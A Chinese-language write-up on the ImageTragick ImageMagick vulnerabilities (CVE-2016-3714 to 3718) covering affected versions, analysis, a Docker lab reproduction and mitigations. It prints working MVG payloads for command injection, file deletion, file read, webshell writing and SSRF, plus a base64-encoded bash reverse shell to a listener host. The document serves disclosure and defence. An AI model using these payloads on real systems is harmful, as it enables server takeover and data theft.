19.Imagetragick 命令执行漏洞（CVE-2016–3714）

Imagetragick 命令执行漏洞（CVE-2016–3714）

漏洞简介：

Imagetragick 命令执行漏洞在16年爆出来以后，wooyun上面也爆出了数个被该漏洞影响的大厂商，像腾讯，

新浪，慕课....影响巨大，这里贴出wooyun上关于此漏洞的案例：http://wooyun.org/bugs/wooyun-2016-0205125

ImageMagick是一款使用量很广的图片处理程序，很多厂商都调用了这个程序进行图片处理，包括图片的伸缩、切割、水印、格式转换等等。

但有研究者发现，当用户传入一个包含『畸形内容』的图片的时候，就有可能触发命令注入漏洞。

国外的安全人员为此新建了一个网站： https://imagetragick.com/

与这个漏洞相关的CVE有CVE-2016-3714、CVE-2016-3715、CVE-2016-3716、CVE-2016-3717，

其中最严重的就是CVE-2016-3714，利用这个漏洞可以造成远程命令执行的危害。

影响版本：

ImageMagick 6.5.7-8 2012-08-17(手工测试风险存在)

ImageMagick 6.7.7-10 2014-03-06(手工测试风险存在)

低版本至6.9.3-9 released 2016-04-30

漏洞分析：

具体漏洞原理就不详细说了，百度一大堆，贴一个：https://www.leavesongs.com/PENETRATION/CVE-2016-3714-ImageMagick.html

ImageMagick有一个功能叫做delegate（委托），作用是调用外部的lib来处理文件。而调用外部lib的过程是使用系统的system命令来执行，漏洞发生的地方：

<delegate decode="https" command="&quot;curl&quot; -s -k -o &quot;%o&quot; &quot;https:%M&quot;"/>

它在解析https图片的时候，使用了curl命令将其下载，这里定义了一些占位符，如%o是curl输出的文件名，%M是远程的URL路径。注意到command中的可以到%M是可以拼接其他指令并被在命令行中执行的。该漏洞也因此而来，被拼接完毕的命令行传入了系统的system函数，而我们只需使用反引号（`）或闭合双引号，来执行任意命令。也就是下面这样：

command=" "curl" -s -k -o "%o" "https:%M" "/>

当%M为：https://"|id && ls -al /etc/passwd"

command=" "curl" -s -k -o "%o" "https://"|id && ls -al /etc/passwd"" "/>

后面的ls -la也会由于没有安全过滤而通过管道执行。而ImageMagick默认支持一种图片格式，叫mvg，它与svg格式类似，其中是以文本形式写入矢量图的内容，而这其中就可以包含https处理过程。所以Poc如下（poc.mvg）：

push graphic-context
viewbox
fill 'url(https://"|id; ")'
pop graphic-context

这样，ImageMagick在正常执行图片转换、处理的时候就会触发漏洞，执行我们的命令。

另外几个CVE也大同小异，

CVE-2016-3715是利用ImageMagick支持的ephemeral协议，来删除任意文件，POC如下：

push graphic-context
viewbox
image over , , 'ephemeral:/tmp/delete.txt'
popgraphic-context

$ touch /tmp/delete.txt
$ convert delete_file.mvg out.png # deletes /tmp/delete.txt

CVE-2016-3716是利用ImageMagick支持的msl协议，来进行文件的读取和写入。利用这个漏洞，

可以将任意文件写为任意文件，比如将图片写为一个.php后缀的webshell。

特别说明的是，msl协议是读取一个msl格式的xml文件，并根据其内容执行一些操作：

file_move.mvg
-=-=-=-=-=-=-=-=-
push graphic-context
viewbox
image over , , 'msl:/tmp/msl.txt'
popgraphic-context

/tmp/msl.txt
-=-=-=-=-=-=-=-=-
<?xml version="1.0" encoding="UTF-8"?>
<image>
<read filename="/tmp/image.gif" />
<write filename="/var/www/shell.php" />
</image>

CVE-2016-3717可以造成本地文件读取漏洞：

push graphic-context
viewbox
image over , , 'label:@/etc/hosts'
pop graphic-context

$ convert file_read.mvg out.png # produces file with text rendered from
/etc/passwd

CVE-2016-3718，它是利用mvg格式中可以包含url的特点而发起HTTP GET或者FTP请求，进行SSRF攻击，POC如下（ssrf.mvg）：

push graphic-context
viewbox
fill 'url(http://example.com/)'
pop graphic-context

$ convert ssrf.mvg out.png # makes http request to example.co

漏洞复现：

一些测试使用的POC：https://github.com/ImageTragick/PoCs

本次漏洞是用docker环境搭建的，环境文件夹有以下三个文件：
├── demo.php     # 使用vul.jpg+identify命令测试
├── upload.php   # 支持用户进行上传，并将上传的文件传入PHP的imagick扩展，触发漏洞
└── vul.jpg          # 一个简单的POC
我们分别来看这三个文件：
vul.jpg:

分析可得上述代码可得 ,上述代码用来读取我们的 /etc/passwd 文件

demo.php:

shell_exec()函数是php命令中用来执行shell命令的函数

upload.php:

访问 http://192.168.0.132/demo.php，命令成功被执行：

既然能执行命令，我们上传图片，构造POC：

push graphic-context
viewbox
fill 'url(https://127.0.0.0/joker.jpg"|curl "192.168.0.132:4444)'
pop graphic-context

已经接收到http请求，说明curl命令执行成功。

构造反弹shell，POC：

push graphic-context
viewbox
fill 'url(https://127.0.0.0/bmjoker.jpg?`echo L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjguMC4xMzIvNDQ0NCAwPiYx | base64 -d | bash`"||id " )'
pop graphic-context

这里的 /bin/bash -i >& /dev/tcp/192.168.0.132/4444 0>&1 需要用base64加密

成功得到shell！

修复建议：

关于这个漏洞影响ImageMagick 6.9.3-9以前是所有版本，包括ubuntu源中安装的ImageMagick。而官方在6.9.3-9版本中对漏洞进行了不完全的修复。所以，我们不能仅通过更新ImageMagick的版本来杜绝这个漏洞。

现在，我们可以通过如下两个方法来暂时规避漏洞：

1. 处理图片前，先检查图片的 magic bytes，也就是图片头，如果图片头不是你想要的格式，那么就不调用ImageMagick处理图片。如果你是php用户，可以使用getimagesize函数来检查图片格式，而如果你是wordpress等web应用的使用者，可以暂时卸载ImageMagick，使用php自带的gd库来处理图片。
2. 使用policy file来防御这个漏洞，这个文件默认位置在 /etc/ImageMagick/policy.xml ，我们通过配置如下的xml来禁止解析https等敏感操作：

<policymap>
<policy domain="coder" rights="none" pattern="EPHEMERAL" />
<policy domain="coder" rights="none" pattern="URL" />
<policy domain="coder" rights="none" pattern="HTTPS" />
<policy domain="coder" rights="none" pattern="MVG" />
<policy domain="coder" rights="none" pattern="MSL" />
</policymap> 

参考链接：

http://www.vuln.cn/6152

https://www.leavesongs.com/PENETRATION/CVE-2016-3714-ImageMagick.html

https://www.anquanke.com/post/id/83871